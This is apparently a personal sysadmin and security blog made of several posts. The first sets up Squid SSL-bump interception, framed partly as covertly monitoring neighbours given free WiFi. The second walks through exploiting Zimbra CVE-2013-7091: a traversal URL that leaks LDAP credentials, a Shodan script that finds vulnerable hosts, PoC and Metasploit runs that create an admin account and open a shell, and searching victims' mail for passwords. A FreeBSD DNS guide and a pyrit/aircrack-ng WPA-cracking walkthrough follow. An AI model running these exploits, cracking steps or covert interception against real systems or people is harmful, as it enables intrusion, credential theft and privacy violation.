Install and Configure Squid with SSL-Bump on CentOS7 ,Restrict Domain and URL access with SquidGuard and Analyze it all with SquidAnalyzer:

For some reasons you may want to have an idea of what’s happening around you. It could be in a corporate setup and you are the network admin and you just want to have an idea of what your users are up to. Or maybe it’s sort of a policy.
In other cases it could be for fun like in my case where by you have given a number of your neighbors Free Access to WiFi. But you decide let it not be just free. Why don’t they ‘give’ you some ‘dummy’ data for ‘personal’ use after all you are giving them free internet access for ‘personal’ use.

Whichever the case let’s look at how we can setup Squid (A very powerful caching proxy) to help us monitor web access as well as restrict access where need be.
Setting up transparent Squid proxy for caching and access restriction is trivial but only if we are dealing with HTTP/FTP traffic only. Fortunately or unfortunately this is not the case. As of this date the biggest percentage of web traffic is encrypted (https://transparencyreport.google.com/https/overview).

This is a good thing but again it poses another challenge. What about encrypted attacks ? There are many of them out there if not all. This means IDS/IPSes will miss these attacks. What about the monitoring ? how do you get to monitor your users if they are sending data through an encrypted channels ?All the above questions have been addressed mostly so let’s go straight to our setup.

When looking up “Setting up Squid with SSL Bump” most of the guides seemed to fail for some reason or another, Others were sort of incomplete in one way or another. The aim of this guide is put together a working example borrowing from different guides that I found to be working so kindly note that this is not 100% done from scratch but bits of information from different sources all listed at the bottom.

Step 1: Install CentOS 7 minimal
The ISO file can be downloaded from your nearest mirror check this link:

https://www.centos.org/

Note: After install run

#yum update

Step 2: Install and configure Squid with SSL Bump.
Note: Remember to change a number of things to fit your setup i.e the network interface cards.

This setup assumes two interfaces – One external connected to ISP and one internal for LAN users. For any deviation please change steps appropriately.

[1]Install squid on you CentOS installation.

#yum -y install squid
[2]Create CA certificate and key for SSL bump

#cd /etc/squid
#mkdir ssl_cert
#chown squid:squid ssl_cert
#chmod 700 ssl_cert
#cd ssl_cert
#openssl req -new -newkey rsa:2048 -sha256 -days 365 -nodes -x509 -keyout myCA.pem -out myCA.pem

[3] Then extract certificate for importing in browsers

#openssl x509 -in myCA.pem -outform DER -out myCA.der

[4] Disable SELinux

#setenforce 0

Note: Also edit ‘/etc/sysconfig/selinux’ appropriately. (Very well explained)

[5] Generate DH parameters in ‘/etc/squid’ folder

#openssl dhparam -outform PEM -out dhparam.pem 2048

[6] Edit ‘/etc/squid/squid.conf’ and use following before ‘http_access deny all’ rule:


#Enable quick shutdown
shutdown_lifetime 0 seconds

#Enable transparent proxy with SSL bump
http_port 3126 intercept
https_port 3127 intercept ssl-bump generate-host-certificates=on dynamic_cert_mem_cache_size=16MB cert=/etc/squid/ssl_cert/myCA.pem
http_port 3128 ssl-bump generate-host-certificates=on dynamic_cert_mem_cache_size=16MB cert=/etc/squid/ssl_cert/myCA.pem

#Configure SSL Bump for all sites
acl broken_sites dstdom_regex xyzbank.com
acl monitor_domains dstdom_regex youtube.com facebook.com ytimg.com googlevideo.com ggpht.com 
acl monitor_domains2 dst 216.58.196.110 216.58.199.174 #youtube connect works over IP
ssl_bump none localhost
ssl_bump none broken_sites #Avoid bumping financial sites such as banks
ssl_bump server-first monitor_domains #Bump facebook and youtube
ssl_bump server-first monitor_domains2 #Since youtube bump fails with just domain also add youtube serverIP

#Configure hostname
visible_hostname squidx.somewhere.com

#Configure logging of query terms
strip_query_terms off #This will allow checking which youtube URLs were visited by user

[7] Initialize SSL certificate directory

#/usr/lib64/squid/ssl_crtd -c -s /var/lib/ssl_db
#chown -R squid:squid /var/lib/ssl_db/

[8] After this try starting squid

#systemctl start squid
#systemctl status squid
#systemctl enable squid

Note: You can ignore SELinux warnings related to certificate access to /var/lib/ssl_db if any

[9] Enable IP forwarding

#sysctl net.ipv4.ip_forward=1

[10] Create file ‘/etc/sysctl.d/ipv4_forward.conf’ with following contents:


net.ipv4.ip_forward = 1

[11] Labels interface internal and external appropriately by appending ‘ZONE=internal’ or ‘ZONE=external’ in ‘/etc/sysconfig/network-scripts/ifcfg-‘ files.
[12] Set zones and verify settings:

#systemctl restart network
#firewall-cmd –get-active-zones

[13] Configure firewall rules for allowing access to incoming ports

#firewall-cmd –zone=internal –add-port=3126/tcp –permanent
#firewall-cmd –zone=internal –add-port=3127/tcp –permanent
#firewall-cmd –zone=internal –add-port=3128/tcp –permanent

[14] Use direct interface of firewalld to configure port redirection. Edit file /etc/firewalld/direct.xml and put the below text
Note: make sure you use your interface here

codepaste

Replace internal interface name after “-i” in above XML file

[15] Enable and verify direct rules using:

#firewall-cmd –reload
#firewall-cmd –direct –get-all-rules

[6] Enable masquerade

#firewall-cmd –permanent –zone=external –add-masquerade
#firewall-cmd –reload
#firewall-cmd –zone=external –list-all

[7] Configure a browser with proxy:3128 and HTTP/HTTPS browsing should work.
Verify that logs in /var/log/squid/access.log are getting updated.(just tail and follow with -f)

Done! Squid should be up and running and able to access all the sites both HTTP and HTTPS
Step 2: Restricting Access with SquidGuard:
[1]Installing SquidQuard:
In order to install SquidGuard from the repositories we need to use external repositories
to install do the following.

# yum -y install yum-plugin-priorities

Then we need to set [priority=1] to official repository
# sed -i -e “s/\]$/\]\npriority=1/g” /etc/yum.repos.d/CentOS-Base.repo
Lets install the EPEL repository which is provided from Fedora project.
# yum -y install epel-release

We can set the priority to 5 [priority=5]

# sed -i -e “s/\]$/\]\npriority=5/g” /etc/yum.repos.d/epel.repo

We can also disable it by default and only enable it if we need it during package installation This we will do by simply changing from enabled=1 to enabled=0 in “/etc/yum.repos.d/epel.repo”

# sed -i -e “s/enabled=1/enabled=0/g” /etc/yum.repos.d/epel.repo

Now we go straight and install SquidGuard from the EPEL repo.

# yum –enablerepo=epel -y install squidGuard

[2]Backup the config file and create a new one.

# mv /etc/squid/squidGuard.conf /etc/squid/squidGuard.conf.bak

# vi /etc/squid/squidGuard.conf

And put this content.


dbhome /var/lib/squidGuard/db
logdir /var/log/squidGuard
# define 'deny' category

dest deny {
# define prohibited domain list in 'deny' category

domainlist deny/domains
# define prohibited URL list in 'deny' category

urllist deny/urls
}
acl {
default {
# permit all except 'deny' category

pass !deny all
# the redirected URL if matches 'deny'
redirect http://127.0.0.1/error.html
}
}

Let’s create a directory where we will put all our restricted URLs and Domains.

# mkdir -p /var/lib/squidGuard/db/deny

# vi /var/lib/squidGuard/db/deny/domains
Then we write down all the domains we would like to prohibit to access to


google.com
amazon.com

If you have some specific URLs you need to add them on the url text file as shown below

# vi /var/lib/squidGuard/db/deny/urls


https://www.facebook.com/pages/creation/?ref_type=registration_form

https://anyother.domain/pages/you/want/to_deny/access.to

All is now done we need to tell SquidGuard to generate a DB with our new denied domains and URLs.

# squidGuard -C all

we change the ownership of the folder to our Denied URLs and Domains
# chown -R squid. /var/lib/squidGuard/db/deny

We are done with SquidGuard now. But wait our Squid installation will just let everything pass through unless we tell it otherwise.
So we go a head and edit Squid Config File and add the url_rewrite_program option.
# vi /etc/squid/squid.conf
add the following to the end


url_rewrite_program /usr/bin/squidGuard -c /etc/squid/squidGuard.conf

You can now restart squid

# systemctl restart squid
That’s all. to test our domain/URL block just visit http://www.google.com and it should fail. and re-direct you to http://127.0.0.1 (This can be changed if you wish).
Note: In this example we have used just two domains for demonstration. For a more practical blacklisting check out http://www.squidguard.org/blacklists.html

That’s all well said and done but would it not be better if we can visualize what is happening ? Let’s lastly look at SquidAnalyzer.

Step 3: Install SquidAnalyzer:

Let’s create a folder,download SquidAnalyzer and install it.

#mkdir /opt/squidanalyzer
#cd /opt/squidanalyzer
#yum install gd make libpng perl-ExUtils-MakeMaker perl-GD-Graph perl-GD-Graph3d perl-TimesHiRes

We will also need build tools and perl dev

#yum group install “Development Tools”
#yum install perl-devel

Now we Download the file and install:

#wget https://tenet.dl.sourceforge.net/project/squid-report/squid-report/6.6/squidanalyzer-6.6.tar.gz
#tar -zxvf squidanalyzer-6.6.tar.gz
#cd squidanalyzer-6.6
#perl Makefile.PL
#make
#make install

Now go ahead and back up the original config file

#cp /etc/squidanalyzer/squidanalyzer.conf /etc/squidanalyzer/squidanalyzer.conf.bak
Edit config file to reflect what we want… The most important options are shown below.

#vi /etc/squidanalyzer/squidanalyzer.conf


# Path where SquidAnalyzer should dump all HTML and images files.
# Choose a path that can be read by a Web browser
Output /var/www/html/squidanalyzer

# The URL of the SquidAnalyzer javascript, HTML and images files.
## WebUrl /squidreport
WebUrl /squidanalyzer

# Set the path to the Squid, squidGuard and/or ufdbGuard log files
## LogFile /var/log/squid/access.log
LogFile /var/log/squid/access.log

 

With the above three we should be good to go.
We also need to edit network-aliases of SquidAnalyzer to reflect our network in case you are using VirtualBox host only default is(192.168.56.0)
#vi /etc/squidanalyzer/network-aliases


#
# See examples below.
#
#——————————————————————————-
#Home Network 192\.168\.1\.
#Associated Networks ^10\.169\.[2-4]\.,^10\.169\.[7-9]\.
#ClassB Network 10.172.0.0/16
#ClassC Network 192.168.1.0/24
Custom Network 192.168.56.0/24

That’s all with SquidAnalyzer install and configuration. Now by default there is nothing to view. in order to get our data analyzed we need to run SquidAnalyzer so as it can populate the folders with web based content. We will do this by running the below command.

# /usr/local/bin/squid-analyzer

This should take a few seconds depending on the number of squid log you have.
it is important to note that SquidAnalyzer will not populate the dashboard/interface with new data unless you run it. So to automate this you can simply create a cron job to be doing this either daily, hourly or as you wish. for example
vi /etc/crontab


# SquidAnalyzer log reporting daily
0 2 * * * root /usr/local/bin/squid-analyzer > /dev/null 2>&1

The above will make squidanalyzer run daily and create new visuals for access via browser.
Now if you look up few lines above on the SquidAnalyzer, you will notice the below options.


Output /var/www/html/squidanalyzer
WebUrl /squidanalyzer

This is basically the webroot folder and the exact URL you will need to access to use squidanalyzer. This simply suggests that a web server of sort is needed.
So lets go with Apache(httpd)
Installing httpd is trivial. We will use 80/TCP(default)
# yum -y install httpd
Open the welcome page and comment out everything (You an also remove it completely but it will be created in case you upgrade)

#vi /etc/httpd/conf.d/welcome.conf
or
# rm -f /etc/httpd/conf.d/welcome.conf

Configure httpd and change the DocumentRoot to “/var/www” or to match your own environment.
# vi /etc/httpd/conf/httpd.conf

Finaly restart httpd and enable start at boot time.
# systemctl start httpd
# systemctl enable httpd

That’s it.

Visit http://yourproxyIP/squidanalyzer and enjoy. You should have this sort of view but of course depends on the number of logs you got.

squid_analyzer

Note: This page can be password protected with .htacces just search for ‘apache protect with htaccess’

Reference:

Squid+SSL Bump:
SquidGuard:
SquidAnalyzer:

Advertisements

Replicating Zimbra exploit CVE-2013-7091

In this post I will quickly show how using a Zimbra directory traversal vulnerability a remote attacker can easily break into other completely unrelated hosts on the internet.

Don’t know what Zimbra is ?

From Zimbra themselves:
Zimbra is an enterprise-class email, calendar and collaboration solution, built for the cloud, both public and private……..

Just read “what is Zimbra?” from http://www.zimbra.com/ but in summary Zimbra will help you setup and manage email server for your organization and your users working without much hustle

About the Vulnerability:

This vulnerability was discovered early December 2013 by rubina119 to be precise the disclosure date is 2013-12-06

What does it involve ?

Simply picked from http://osvdb.org description

Zimbra contains a flaw that may allow a remote attacker to execute arbitrary commands or code. The issue is due to /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz not properly sanitizing user input, specifically directory traversal style attacks (e.g., ../../) supplied to the ‘skin’ parameter. This may allow an attacker to include a file from the targeted host that contains arbitrary commands or code that will be executed by the vulnerable script. Such attacks are limited due to the script only calling files already on the target host. In addition, this flaw can potentially be used to disclose the contents of any file on the system accessible by the web server.

Enough with that so when I saw this I read somewhere(can’t remember where) that it was tested successful on Ubuntu server 12.04 so I decided to test and see if it works on CentOS.
The first step was to do a CentOS install on VirtualBox I went for “CentOS-6.3-x86_64-LiveCD.iso”.

# uname  -a
Linux localhost.localdomain 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
[root@localhost ~]# 

With CentOS up running we can grab a vulnerable copy of Zimbra Collaboration Server (ZCS) from http://www.zimbra.com/

Note: There are several versions avaiable but the vulnerable/affected ones are 8.0.2 and 7.2.2
setting up ZCS is pretty much easy and in case of problems there are solutions all over they are only a search away


http://www.howtoforge.com/installing-zimbra-collaboration-suite-7-on-centos-5.x-64bit

The Attack:
As documented in the original POC a remote attacker can read /opt/zimbra/conf/localconfig.xml which has credentials for zimbra ldap user “zimbra_user” and password “zimbra_ldap_password” which can be used to create an admin user in Zimbra as well upload files in “/opt/zimbra/jetty-distribution-7.6.2.z4/webapps/zimbra/downloads” (think of uploading malicious files and executing them)
When ZCS is running user can easily read there emails via browser by simply going to “mail.their-organisation.com”
so to give the exploit a trial we simply need to visit the mail server IP then append
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00


https://192.168.0.101/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

Note:
Doing a Ctrl + F and type “ldap_pass” will show zimbra user ldap password in clear text

Risk:

At the moment many people will not see how this is a big issue,but as stated above this vulnerability can aid an attacker completely control an organization mail server by creating an administrator user in the mail server who can read all users emails as well send emails with any email address identity in the organization.
Again this might not seem as an issue to some people but imagine an attacker does not send any email but he/she searches for juicy information in all users emails.
In this day and age people still email credentials in clear text if you don’t believe it simply search your official email address for “password” or even “login“.
now think of a scenario where the organization in question is a site hosting company or a local ISP I know you can think of even more scenarios.

How can you become a target ?

Finding these targets is more trivial than many people want to imagine for example an attacker use shodan http://www.shodanhq.com/ many people know it if not just check it out but simply put shodan is like google for hackers.
With shodan you can get an API key and come up with a simple python script to grab IPs of machines running Zimbra and you can even be more specific and grab a particular country by simply specifying the country code.
the below python script can list IPs of host running Zimbra given a valid API key

#a python script to search Shodan given a valid API
#author: plast1k
#ref: shodan API reference 

from shodan import WebAPI
SHODAN_API_KEY = "XXXXX_a valid shodan API key here XXXXXX"

api = WebAPI(SHODAN_API_KEY)
# Wrap the request in a try/ except block to catch errors
try:
        # Search Shodan
        results = api.search('zimbra country:"country_code_here"')

        # Show the results
        print 'Results found: %s' % results['total']
        for result in results['matches']:
                print 'IP: %s' % result['ip']
                #print result['data']
                print ''
except Exception, e:
        print 'Error: %s' % e

#end

NB:to be able to import WebAPI you need python library for shodan this can be easily done using easy_install


:~#  easy_install shodan
Searching for shodan
Best match: shodan 0.9.0
Processing shodan-0.9.0-py2.7.egg
shodan 0.9.0 is already the active version in easy-install.pth

Using /usr/local/lib/python2.7/dist-packages/shodan-0.9.0-py2.7.egg
Processing dependencies for shodan
Finished processing dependencies for shodan
:~# 

Case Study:

Using the Zimbra installation we got let see how can this vulnerability can be used to give access to some other hosts as well a wealth of infomation.
lets download the original POC ruby script from packet storm and extract it


:~$ mkdir zimbra
:~$ cd zimbra
:~/zimbra$ wget http://packetstormsecurity.com/files/download/124321/zimbra-lfi.tgz
:~/zimbra$ tar -xvf zimbra-lfi.tgz 
zimbra-lfi.txt
run.rb
ultils.rb
:~/zimbra$ 

Then assuming you have read through it we try it against our target
(please don’t try on system you don’t own)


ruby run.rb  -t 192.168.0.101 -u zimbra -p nd7qw334sRRJFR

#########################################################################################
Zimbra Email Collaboration Server 0day Exploit by rubina119
#########################################################################################

[+] Looking if host is vuln...
[+] Host is vuln exploiting
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
[+] Login Credentials
    [*] Login URL : https://zimbra.chimera.co.ke:7071/zimbraAdmin/ 
    [*] Account   : zimbra@zimbra.chimera.co.ke
    [*] Password  : nd7qw334sRRJFR
[+] Successfully Exploited !

As you can see an administrator user has been created on our target Zimbra server now using these new credentials we simply browse to the Zimbra admin URL usually https://server-ip:7071/zimbraAdmin/ and login

zim_login

Right clicking on Alice’s we can read all her emails and doing a simple search for word password we can find she had sent an email to Bob some times back with login details for another server

search_password

Final words:

This issue should not be ignored as it is critical and not as minor as many would want to take it given the possible number people running these versions of Zimbraon the internet.
It is also very important to noet that this same flaw can be used to gain shell access to these systems as well and a metaspoit module is even there to give the attacker shell access instantly. (See the below metasploit example )


msf exploit(zimbra_lfi) > show options 

Module options (exploit/unix/webapp/zimbra_lfi):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      9                yes       Traversal depth until to reach the root path
   Proxies                     no        Use a proxy chain
   RHOST      192.168.0.101    yes       The target address
   RPORT      7071             yes       The target port
   TARGETURI  /zimbraAdmin     yes       Path to zimbraAdmin web application
   VHOST                       no        HTTP server virtual host
   ZIMBRADIR  /opt/zimbra      yes       Zimbra installation path on the target filesystem (/opt/zimbra by default)

Payload options (linux/x86/shell/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.0.101    no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Zimbra 8.0.2 / Linux

msf exploit(zimbra_lfi) > exploit 

[*] Started bind handler
[*] 192.168.0.101:7071 - Getting login credentials...
[+] 192.168.0.101:7071 - Got login credentials!
[*] 192.168.0.101:7071 - Getting auth token...
[+] 192.168.0.101:7071 - Got auth token!
[*] 192.168.0.101:7071 - Uploading payload
[*] 192.168.0.101:7071 - Uploading jsp stager
[*] 192.168.0.101:7071 - Executing payload on /downloads/pghMCARIa.jsp
[*] Sending stage (36 bytes) to 192.168.0.101
[*] Command shell session 1 opened (192.168.0.102:47679 -> 192.168.0.101:4444) at 2014-01-11 23:43:35 +0300
[+] Deleted ../jetty/webapps/zimbra/downloads/pghMCARIa.jsp
[+] Deleted ../jetty/webapps/zimbra/downloads/TfTXWDJInTRhCp

1126108370
desJMuxOIzwyyRgjsRoskoduIAaGetPB
yovsKBLRoOYhVpvWeiMypsPOkjOFaTBw
QXQQEVIhPpxBlHrtVYtmlwpPWMjcwfxc
uname -a
Linux localhost.localdomain 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux

So if you are a Zimbra admin make an effort of upgrading

Reference:

http://cvedetails.com/cve/2013-7091/
http://www.osvdb.org/100747
http://www.securityfocus.com/bid/64149
http://www.exploit-db.com/exploits/30085
http://cxsecurity.com/issue/WLB-2013120097
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/zimbra_lfi.rb

configuring named in FreeBSD 8.2-RELEASE

############# named configuration in FreeBSD 8.2-RELEASE ###############
***********************************************************************************************
0x00
to configure a static ip address in freeBSD on em0 card at boot time you need to
[1] edit the file /etc/rc.conf and add the following entry


ifconfig_em0="inet 192.168.1.3 netmask 255.255.255.0"

where em0 happens to be your card and inet ip address of your choice and you should have a new interface
at boot time next time. or else "/etc/rc.d/netif restart" to restart the network
0x01
----
to configure a static ip on red hat and (family) at boot time edit /etc/sysconfig/network-scripts/ifcfg-eth0 file
and put your card infomation right there
i.e

DEVICE="eth0"
BOOTPROTO="none"
IPADDR="192.168.20.20"
NETMASK="255.255.255.0"
BROADCAST="192.168.20.255"
ONBOOT="yes"

then restart the network


#/etc/init.d/networking restart

thats all you should get an ip at boot time as well

0x02
----
WORD OF CAUTION:
================
***************************************************************************************************************
this was done with no security in mind not even the least it is just a working solution to my personal problem
please learn how DNS works,DNS security and all what is involved first in case of production deployment
*******************************************************************************************************

named/bind9 comes packaged in your freebsd installation DVD so there is no need to get it from FreeBSD ports

howto
-----
to start/restart/stop named in FreeBSD you need to run

/etc/rc.d/named [start|restart|stop|etc]

to do other small administrative jobs you use the rncd utility (comes with named installation)
to communicate to named securely

Example:
********

so lets say you want to set up your own domain call it "chimera.org"

step [1]
--------
you need to create a zone in named config file which is located in
"/etc/namedb/named.conf"
but before that lets backup our original .conf


# cp /etc/namedb/named.conf /etc/namedb/named.conf.bak

step[2]
-------

lets add our new zone entry

# vi /etc/namedb/named.conf

so we search for the word zone (in vi do escape /zone) pressing 'n' will go to the next match
and add our new entry e.g

zone "chimera.org"      { type master; file "/etc/namedb/master/chimera.org.db"; };

step[3]
-------
now we can populate our file "/etc/namedb/master/chimera.org.db" with records

# vi /etc/namedb/master/chimera.org.db

and put the following sample (you may change to fit your needs)

$TTL    1d
chimera.org.  IN    SOA   ns.chimera.org. support.chimera.org. (
    2010031500 ; se = serial number
    3h         ; ref = refresh
    15m        ; ret = update retry
    3w         ; ex = expiry
    3h         ; min = minimum
    )

    IN    NS    ns.chimera.org.

; private hosts
freebsd        IN    A    192.168.20.200
centos        IN    A    192.168.20.120
thinkpad      IN    A    192.168.20.100

step [4]
--------

finaly lets edit our "/etc/resolv.conf" to point to our local DNS server

# vi /etc/resolv.conf

edit it look something close to this

domain chimera.org
nameserver  192.168.20.200
nameserver 127.0.0.1

where 192.168.20.200 is the local machine we are working on (you replace your DNS server here)

then put the same value "192.168.20.200" in your "/etc/namedb/named.conf"

# vi /etc/namedb/named.conf

search for "listen-on" i.e (escape /listen-on)
and replace 127.0.0.1 with 192.168.20.200

step [5]
--------

thats all there is so finally lets restart our DNS server

# /etc/rc.d/named stop
# /etc/rc.d/named start

or just

# /etc/rc.d/named restart

if all went well your server should be up and running

client setup and testing
------------------------

if your clients use DHCP to get IP addresses the you need to feed your DHCP server with details
about your DNS server and domain.
if the clients get IP addresses manually then edit their individual "/etc/resolv.conf" to have an entry close to one below


domain chimera.org
nameserver 192.168.20.200

NB:wether you used DHCP or manual your clients should end up with this kind of entry
finaly from one of the clients you can use dig or nslookup to test your brand new DNS server
eg:

[root@centos ~]# dig any thinkpad.chimera.org

; <> DiG 9.3.6-P1-RedHat-9.3.6-4.P1.el5_5.3 <> any thinkpad.chimera.org
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 18658
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;thinkpad.chimera.org.		IN	ANY

;; ANSWER SECTION:
thinkpad.chimera.org.	86400	IN	A	192.168.20.100

;; AUTHORITY SECTION:
chimera.org.		86400	IN	NS	ns.chimera.org.

;; Query time: 5 msec
;; SERVER: 192.168.20.200#53(192.168.20.200)
;; WHEN: Thu Dec 15 20:12:08 2011
;; MSG SIZE  rcvd: 71




[root@centos ~]# nslookup freebsd.chimera.org
Server:		192.168.20.200
Address:	192.168.20.200#53

Name:	freebsd.chimera.org
Address: 192.168.20.200

very thing seems to be working fine at least for me or so i think finally lets make our server come up at boot time

simply add this line your "/etc/rc.conf";

named_enable="YES"

your named server will start next time you reboot
that's pretty much it or at least this is how i understand it for now

home:
jlug:
###################################END###########################################

cracking WPA using pyrit and or aircrack-ng

cracking WPA using pyrit and or aircrack-ng
+==========================================================+
in this blog post I will document how to recover a WPA passphrase used to secure
a wireless access point using pyrit and or aircrack-ng for increased SPEED.
There are lots of documentations about the same out there but this is for quick reference
if I ever need it agently.

assumptions:
++++++++++++++++
[1] This assumes you know what aircrack-ng is,you know what pyrit is and you have installed in your machine
with CUDA support.
if not kindly refer to the below links:
pyrit project: http://code.google.com/p/pyrit/
aircrack-ng: http://www.aircrack-ng.org/
[2]You have been able to capture WPA handshake and you have it stored in a capture file. if not refer to aircrack-ng

procedure:
++++++++++++++++

benchmark:
++++++++++++++++
let’s do a benchmark and see what we have


root@thinkpad:~# pyrit benchmark
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Running benchmark (826.7 PMKs/s)... \

Computed 826.67 PMKs/s total.
#1: 'CUDA-Device #1 'Quadro NVS 140M'': 515.6 PMKs/s (RTT 3.1)
#2: 'CPU-Core (SSE2)': 393.8 PMKs/s (RTT 3.4)

yes I have a GPU look at the ‘CUDA-Device’ not so powerful but a GPU anyway 🙂

analyzing:

++++++++++++
for a second we analyze our capture file before we proceed (the capture was done using airodump-ng).



root@thinkpad:~# pyrit -r wpa_capture-01.cap analyze
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'wpa_capture-01.cap' (1/1)...
Parsed 15 packets (15 802.11-packets), got 1 AP(s)

#1: AccessPoint 00:25:86:b4:a5:3e ('freenet'):
#1: Station 00:c0:ca:36:79:22
#2: Station 00:21:5c:7e:2b:5d, 1 handshake(s):
#1: HMAC_SHA1_AES, good, spread 1

Pyrit has successfuly gone through the capture file and found one AccessPoint with BSSID 00:25:86:b4:a5:3e and ESSID ‘freenet’ and two Stations communicating with that AccessPoint. The key-negotiation (known as the fourway-handshake) between the Station with MAC 00:21:5c:7e:2b:5d and the AccessPoint has also been recorded in the capture file. We can use the data from this handshake to guess that password that is used to protect the network

NB: it is important to note here that pyrit can comfortably handle gzip-compressed dump files either as output or input

since everything seems to work O.K lets now make use of the powerful pyrit feature of databases use:
guessing the password used in a WPA(2)-PSK key-negotiation is a computational-intensive task.
this is usually due to the computation of a “Pairwise Master Key”, a 256-bit key derived from the ESSID and a password/passphrase using the PBKDF2-HMAC-SHA1-algorithm.
for more on PBKDF2-HMAC-SHA1-algorithm
check out
http://www.ietf.org/rfc/rfc2898.txt for PBKDF2
http://www.ietf.org/rfc/rfc2104 for HMAC
http://www.ietf.org/rfc/rfc3174.txt for SHA1

so where does pyrit come in then?
pyrit can store ESSIDs, passwords/passphrases and their corresponding Pairwise Master Keys in a database
this becomes valueable to have the pre-computed tables of Pairwise Master Keys and ESSIDs.
this dramaticaly reduces the amount of time needed to recover/guess this password since the hardest part has been done.
“the computetion of Pairwise Master Key”

populating our database with wordlists:

+++++++++++++++++++++++++++++++++++++++

NB:pyrit can use filesystem-based storage (‘file://’ which is the default) as well use most SQL-databases
these are some supported databases: SQLite (I have tested),postgreSQL and mySQL

so how do we import our wordlist?

root@thinkpad:~# pyrit -i /pentest/passwords/wordlists/darkc0de.lst import_passwords
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Connecting to storage at 'file://'... connected.
1707657 lines read. Flushing buffers.... ..
All done.

pretty simple and our database is populated
-i is the wordlist we want to import
but wait those are just the possible passwords so we need to add an ESSID (our network name)
‘freenet’ in our case.
how?

root@thinkpad:~# pyrit -e freenet create_essid
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Connecting to storage at 'file://'... connected.
Created ESSID 'freenet'

finally we run pyrit’s eval just to see what we have in there.

root@thinkpad:~# pyrit eval
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Connecting to storage at 'file://'... connected.
Passwords available: 993932

ESSID 'freenet' : 0 (0.00%)

wait, pyrit read just below a million passwords in our wordlist ?
we saw “1707657 lines read. Flushing buffers…. ..” from import_password command
but ‘eval’ shows “Passwords available: 993932” only!
why ?
yes pyrit automatically filters passwords that are not suitable for WPA(2)-PSK and also sorts out duplicates when populating the database for the obvious reasons.

batch_processing:

++++++++++++++++

now with our ESSID and a couple of words in our database lets batch-process them.
here pyrit will take our ESSID ‘freenet’ and combine with each passphrase in the word list, compute the corresponding Pairwise master Keys and simply store them.

NB. note that our ESSID is just but a variable we can get rid of at will
e.g with the commands

root@thinkpad:~# pyrit -e freenet delete_essid

or

root@thinkpad:~# pyrit -e freenet create_essid

we can create or delete a given ESSID from the database

back to batching.

this MIGHT chew some time as well as your system resources for this I promise (depending on your system)
but personaly I think it’s worth given the time you will wait when computing the pairwise master keys on the fly.
e.g lets say you are going for a wireless pentest day two then you can leave this precomputing at night since you have the ESSIDs from the reccon with you and thats all you need.

root@thinkpad:~# pyrit batch
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Connecting to storage at 'file://'... connected.
Working on ESSID 'freenet'
Processed all workunits for ESSID 'freenet'; 1335 PMKs per second.

Batchprocessing done.

after a not so long wait the batch is done
so lets use our new database to recover the password.


root@thinkpad:~# pyrit -r wpa_capture-01.cap attack_db
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Connecting to storage at 'file://'... connected.
Parsing file 'wpa_capture-01.cap' (1/1)...
Parsed 15 packets (15 802.11-packets), got 1 AP(s)

Picked AccessPoint 00:25:86:b4:a5:3e ('freenet') automatically.
Attacking handshake with Station 00:21:5c:7e:2b:5d...
Tried 721189 PMKs so far (72.7%); 511478848 PMKs per second.

The password is 'What's New? the collected adventures of Phil & Dixie'.

c00l in a blink of an eye we have recovered the passphrase it is “What’s New? the collected adventures of Phil & Dixie”
this happened in less than a second look at this
‘Tried 721189 PMKs so far (72.7%); 511478848 PMKs per second’
from the output
we had just a million passwords in our database but pyrit is doing 511478848 PMKs per second meaning it would have still gonethrough our list in below a second and don’t forget I am only armed with a tiny GPU and pair of CPU cores.
so imagine the potential with a good piece hardware.

aircrack-ng:
+++++++++++++

another one of the cool pyrit features is to export its own database to cowpatty compatible or airolib-ng like database
which can be used with aircrack-ng or cowpatty

so lets see how

root@thinkpad:~# pyrit -o export.hashdb export_hashdb
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Connecting to storage at 'file://'... connected.
The database 'export.hashdb' seems to be uninitialized.
Trying to create default table-layout... Tables created...
Writing passwords...
Wrote 993932 lines...
Writing ESSIDs and results...
Writing 'freenet'...
Wrote 993932 lines...
All done.

here -o specifies the output file you want you want to write to

then lets use aircrack-ng and give it the exported db


root@thinkpad:~# aircrack-ng -r export.hashdb wpa_capture-01.cap
Opening wpa_capture-01.cap
Read 521 packets.

# BSSID ESSID Encryption

